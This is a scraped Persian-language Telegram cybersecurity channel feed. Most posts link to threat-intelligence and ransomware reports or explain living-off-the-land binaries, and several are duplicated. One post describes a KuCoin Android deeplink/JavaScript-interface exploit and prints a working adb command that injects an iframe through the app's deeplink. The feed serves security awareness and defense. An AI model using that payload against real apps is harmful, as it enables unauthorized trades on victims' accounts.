مدال طلای المپیاد جهانی کامپیوتر
دبیر المپیاد جهانی کامپیوتر
عضو هیئت علمی دانشگاه صنعتی شریف
ثبت نام فراموش نشه
https://www.sharifml.ir/
شروع یکشنبه یکم مهرماه
کانال استاد عزیز شریفی زارچی👇👇
@sharif_ml
@Engineer_Computer
دبیر المپیاد جهانی کامپیوتر
عضو هیئت علمی دانشگاه صنعتی شریف
ثبت نام فراموش نشه
https://www.sharifml.ir/
شروع یکشنبه یکم مهرماه
کانال استاد عزیز شریفی زارچی👇👇
@sharif_ml
@Engineer_Computer
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
📎 BlogPost
@Engineer_Computer
#Android
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
adb shell am start -d 'kucoin:///link?data=\<noscript\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</noscript\>'
📎 BlogPost
@Engineer_Computer
#Android
یکی از دغدغه های مدیران و متخصصان امنیت در زمان حادثه اینه که داده ها چقدر و چطور از سازمان خارج شده اند
سوالاتی در این زمینه هست با جواب هایی
اونها رو در لینک زیر بخونید
#نشت_داده #امنیت #امنیت_سایبری
#cybersecurity #threathunting
https://medium.com/@securityaura/data-exfiltration-questions-and-how-to-answer-them-84856b14003c
@Engineer_Computer
سوالاتی در این زمینه هست با جواب هایی
اونها رو در لینک زیر بخونید
#نشت_داده #امنیت #امنیت_سایبری
#cybersecurity #threathunting
https://medium.com/@securityaura/data-exfiltration-questions-and-how-to-answer-them-84856b14003c
@Engineer_Computer
Medium
Data Exfiltration: Questions and How to Answer Them
An Incident Responder insights and stories on how to approach data exfiltration
مقاله زیر رو انتخاب کردم واسه کسایی که میخوان عملکرد EDR رو درک کنند
https://synzack.github.io/Blinding-EDR-On-Windows/
@Engineer_Computer
https://synzack.github.io/Blinding-EDR-On-Windows/
@Engineer_Computer
Red Team Blog
Blinding EDR On Windows
Acknowledgements My understanding of EDRs would not be possible without the help of many great security researchers. Below are some write-ups and talks that really helped me gain the understanding needed and hit the ground running on the research that will…
گزارش های مندینت
خواندنی و مهم
این بار آلوده سازی از طریق PDF
https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/?linkId=10998021
@Engineer_Computer
خواندنی و مهم
این بار آلوده سازی از طریق PDF
https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/?linkId=10998021
@Engineer_Computer
Google Cloud Blog
An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader | Google Cloud Blog
UNC2970 is a cyber espionage group suspected to have a North Korea nexus.
یک گزارش تحلیل بدافزار جالب بخونیم
#امنیت_سایبری #پاورشل #securityawareness #cybersecurity
** تعطیلات ، از سرمایه مهم هستند برای ارتقای شغلی شما . دریابید.
https://securelist.com/sambaspy-rat-targets-italian-users/113851/
@Engineer_Computer
#امنیت_سایبری #پاورشل #securityawareness #cybersecurity
** تعطیلات ، از سرمایه مهم هستند برای ارتقای شغلی شما . دریابید.
https://securelist.com/sambaspy-rat-targets-italian-users/113851/
@Engineer_Computer
Securelist
SambaSpy – a new RAT targeting Italian users
Kaspersky researchers detected a campaign exclusively targeting Italian users by delivering a new RAT dubbed SambaSpy
سلام
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
👍1
گزارشی از فعالیت یک گروه منتسب به ایران
جدید
https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks
@Engineer_Computer
جدید
https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks
@Engineer_Computer
Google Cloud Blog
UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks | Google Cloud Blog
UNC1860 is an Iranian state-sponsored threat actor with specialized tooling and passive backdoors.
❤1
همیشه از پایه بخوانیم.
تنظیم لاگ در ویندوز
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/monitoring-active-directory-for-signs-of-compromise
@Engineer_Computer
تنظیم لاگ در ویندوز
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/monitoring-active-directory-for-signs-of-compromise
@Engineer_Computer
Docs
Monitoring Active Directory for Signs of Compromise
Learn about event log monitoring in Active Directory to improve security
👍1
مجموعه مقالات #امنیت_به_زبان_ساده
دو واژه : LoLBin و LOLBAS
انجام هک در سالها پیش از اقلام محدودی تشکیل شده بود. یعنی هکر با یک یا دو عمل ، ویروسی می نوشت و تخریب مد نظر را انجام میداد یا با هک یک وبسایت به کل دارایی های سازمان تسلط می یافت.
روز به روز به تکنیک های هک افزوده شد و آن تکنیک هاپیچیده شدند و درقالب تاکتیک هایی تجمیع گردیدند. در طرف مقابل تیم امنیت هم بر توان و قدرت دفاعی و کشفی خود افزود. این شد که نفوذ برای دزدی یا تخریب اطلاعات مشکل شد.
در این بین بدلیل مهاجرت سازمانها به فضای دیجیتال ، بخش عمده ای از سازمان به فضای سایبری منتقل شدند. و این سطح تاثیر سازمان از هکر ها را افزایش داد.
لذا سازمانها سعی کردند با پیاده سازی مکانیسم دفاع لایه ای به مقابله با نفوذ بپردازند به نحوی که با وجود گسترش فضای دیجیتال در سازمان؛ حجم ریسکها کنترل شده باقی بماند.
در این بین هکرها راهی جدید برای نفوذ پیدا کردند. اصولا امروزه هک شامل یک یا دو قدم معدود نمیشود و انجام هک در سازمان شامل چندین پله و شامل فرآیند است. که مجموعه آنرا میتوانید در جدول ATT&CK ملاحظه کنید.
در روشهای نفوذ جدید ؛ هکر ها از ابزارهای موجود روی سیستم های سازمان علیه خود سازمان استفاده میکنند.
این روش چه مزیتی دارد ؟
اول اینکه این ابزار ها کاملا در دسترس هستند و نیازی به انتقال آنها به شبکه و سیستم قربانی نیست.
دوم اینکه سیستمهای امنیتی به این اقلام اعتماد دارند.
سوم اینکه با استفاده از این ها ، رد پای کمتری باقی میماند و جرم شناسی و شکار توسط امنیت چی ها سخت میشود.
البته نکات دیگری در این میان هست که فعلا برای جلوگیری از اطاله کلام از آنها چشم پوشی میکنم تا لب مطلب اخذ گردد.
حالا برویم سراغ واژه ای که در ابتدای متن گفته شد:
به مجموعه ای از باینری هایی که در سیستم های سازمان وجود دارد و ما به آنها اعتماد داریم ولی در طول سالها از آنها سوء استفاده شده است LoLBin و LOLBAS گفته میشود یعنی :
Living of the land binary
این یعنی هکر در مراحلی از نفوذ خودش؛ ابزارهای نفوذ را میسازد یا از جایی تهیه میکند ولی در مراحل دیگری از نفوذ ، او از این مجموعه باینری خود سیستم عامل یا سامانه برای تقویت یا افزایش نفوذ و یا اقداماتی چون خروج داده از سازمان و یا رمزنگاری آنها استفاده میکند.
این مساله مشکلی در راه مقابله و کشف نفوذ ایحاد کرده است. البته در SOC ها راهکارهایی برای این موضوع پیاده میشود.
لیست این پاینری ها در پروژه ای جمع آوری شده است که در لینک زیر آنها را ببینید.
https://lolbas-project.github.io/#
#آموزش #امنیت #امنیت_سایبری
#امنیت_به_زبان_ساده
#cybersecurity #threathunting #cyberforensics
🔆 برای آگاهی دیگران ، دانش را نشر دهید و این پست را فوروارد کنید
@Engineer_Computer
دو واژه : LoLBin و LOLBAS
انجام هک در سالها پیش از اقلام محدودی تشکیل شده بود. یعنی هکر با یک یا دو عمل ، ویروسی می نوشت و تخریب مد نظر را انجام میداد یا با هک یک وبسایت به کل دارایی های سازمان تسلط می یافت.
روز به روز به تکنیک های هک افزوده شد و آن تکنیک هاپیچیده شدند و درقالب تاکتیک هایی تجمیع گردیدند. در طرف مقابل تیم امنیت هم بر توان و قدرت دفاعی و کشفی خود افزود. این شد که نفوذ برای دزدی یا تخریب اطلاعات مشکل شد.
در این بین بدلیل مهاجرت سازمانها به فضای دیجیتال ، بخش عمده ای از سازمان به فضای سایبری منتقل شدند. و این سطح تاثیر سازمان از هکر ها را افزایش داد.
لذا سازمانها سعی کردند با پیاده سازی مکانیسم دفاع لایه ای به مقابله با نفوذ بپردازند به نحوی که با وجود گسترش فضای دیجیتال در سازمان؛ حجم ریسکها کنترل شده باقی بماند.
در این بین هکرها راهی جدید برای نفوذ پیدا کردند. اصولا امروزه هک شامل یک یا دو قدم معدود نمیشود و انجام هک در سازمان شامل چندین پله و شامل فرآیند است. که مجموعه آنرا میتوانید در جدول ATT&CK ملاحظه کنید.
در روشهای نفوذ جدید ؛ هکر ها از ابزارهای موجود روی سیستم های سازمان علیه خود سازمان استفاده میکنند.
این روش چه مزیتی دارد ؟
اول اینکه این ابزار ها کاملا در دسترس هستند و نیازی به انتقال آنها به شبکه و سیستم قربانی نیست.
دوم اینکه سیستمهای امنیتی به این اقلام اعتماد دارند.
سوم اینکه با استفاده از این ها ، رد پای کمتری باقی میماند و جرم شناسی و شکار توسط امنیت چی ها سخت میشود.
البته نکات دیگری در این میان هست که فعلا برای جلوگیری از اطاله کلام از آنها چشم پوشی میکنم تا لب مطلب اخذ گردد.
حالا برویم سراغ واژه ای که در ابتدای متن گفته شد:
به مجموعه ای از باینری هایی که در سیستم های سازمان وجود دارد و ما به آنها اعتماد داریم ولی در طول سالها از آنها سوء استفاده شده است LoLBin و LOLBAS گفته میشود یعنی :
Living of the land binary
این یعنی هکر در مراحلی از نفوذ خودش؛ ابزارهای نفوذ را میسازد یا از جایی تهیه میکند ولی در مراحل دیگری از نفوذ ، او از این مجموعه باینری خود سیستم عامل یا سامانه برای تقویت یا افزایش نفوذ و یا اقداماتی چون خروج داده از سازمان و یا رمزنگاری آنها استفاده میکند.
این مساله مشکلی در راه مقابله و کشف نفوذ ایحاد کرده است. البته در SOC ها راهکارهایی برای این موضوع پیاده میشود.
لیست این پاینری ها در پروژه ای جمع آوری شده است که در لینک زیر آنها را ببینید.
https://lolbas-project.github.io/#
#آموزش #امنیت #امنیت_سایبری
#امنیت_به_زبان_ساده
#cybersecurity #threathunting #cyberforensics
🔆 برای آگاهی دیگران ، دانش را نشر دهید و این پست را فوروارد کنید
@Engineer_Computer
استفاده از هوش مصنوعی در تحلیل بد افزار و مهندسی معکوس
راه انداری یک open source disassembler
https://cryptax.medium.com/using-ai-assisted-decompilation-of-radare2-e81a882863c9
@Engineer_Computer
راه انداری یک open source disassembler
https://cryptax.medium.com/using-ai-assisted-decompilation-of-radare2-e81a882863c9
@Engineer_Computer
Medium
Using AI-assisted decompilation of Radare2
A few months ago, Radare2 (aka r2), an open source disassembler which can be entirely used by command line, started implementing AI plugins…
باج افزاری که از بیت لاکر ویندوز علیه ما استفاده میکند
به همراه کانتنت های اسپلانک
#اسپلانک #امنیت
#splunk
https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html?utm_source=linkedin&utm_medium=social-media&linkId=594262321
@Engineer_Computer
به همراه کانتنت های اسپلانک
#اسپلانک #امنیت
#splunk
https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html?utm_source=linkedin&utm_medium=social-media&linkId=594262321
@Engineer_Computer
Splunk
ShrinkLocker Malware: Abusing BitLocker to Lock Your Data | Splunk
The Splunk Threat Research Team shares their findings and methodologies to aid the cybersecurity community in combating ShrinkLocker effectively.
گزارش ISC2
آنچه نیروی کار امنیت فکر میکند بازار نیاز دارد
آنچه استخدام کنندگان میخواهند
https://www.isc2.org/Insights/2024/09/Employers-Must-Act-Cybersecurity-Workforce-Growth-Stalls-as-Skills-Gaps-Widen
@Engineer_Computer
آنچه نیروی کار امنیت فکر میکند بازار نیاز دارد
آنچه استخدام کنندگان میخواهند
https://www.isc2.org/Insights/2024/09/Employers-Must-Act-Cybersecurity-Workforce-Growth-Stalls-as-Skills-Gaps-Widen
@Engineer_Computer
Forwarded from Network Security Channel
سلام
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
وقت بخیر
دو تا طرح اختراع جهانی PCT در رشته (کامپیوتر در گرایش امنیت ) و (کامپیوتر همه گرایش ها) در حال ثبت است
اگر از عزیزان کسی مایل به همکاری در بحث فنی و مالی هست به ایدی زیر پیام بدید
و البته طرح چند رشته ای ترکیبی برای رشته های مختلف هم هست که هنوز شروع به ثبت نکردیم و در رشته های مهندسی پزشکی - پزشکی - دندان پزشکی و شیمی و هوش مصنوعی و دارو سازی و الکترونیک رو شامل میشه 👇👇👇
@Developer_Network
#اخترع_جهانی #استخدام #اختراع #اختراعات #نواوری #امریه #بنیاد_ملی_نخبگان
#PCT #innovation #NIW #EB2 #EB1
@Engineer_Computer
❤2🔥2
گزارش تحلیلی باج افزار بخوانیم.
جدید
https://www.huntress.com/blog/readtext34-ransomware-incident
@Engineer_Computer
جدید
https://www.huntress.com/blog/readtext34-ransomware-incident
@Engineer_Computer
Huntress
ReadText34 Ransomware Incident | Huntress
Huntress analysts see a number of attacks on a daily and weekly basis, some of which include ransomware attacks. Now and again, Huntress analysts will observe a ransomware attack that stands out in some novel manner.
❤1
در این حمله چین تارگت شد.
لینک گزارش حمله در زیر
مطالعه گزارش رو برای سطح ۲ مرکز عملیات امنیت توصیه میکنم
https://www.trendmicro.com/en_no/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html
**از جایی به بعد دوره رفتن کمتر لازمه و بهتره چنین گزارش هایی دائم پیگیری بشه
#cybersecurity #threathunting #securityawareness #risk
@Engineer_Computer
لینک گزارش حمله در زیر
مطالعه گزارش رو برای سطح ۲ مرکز عملیات امنیت توصیه میکنم
https://www.trendmicro.com/en_no/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html
**از جایی به بعد دوره رفتن کمتر لازمه و بهتره چنین گزارش هایی دائم پیگیری بشه
#cybersecurity #threathunting #securityawareness #risk
@Engineer_Computer
❤1👍1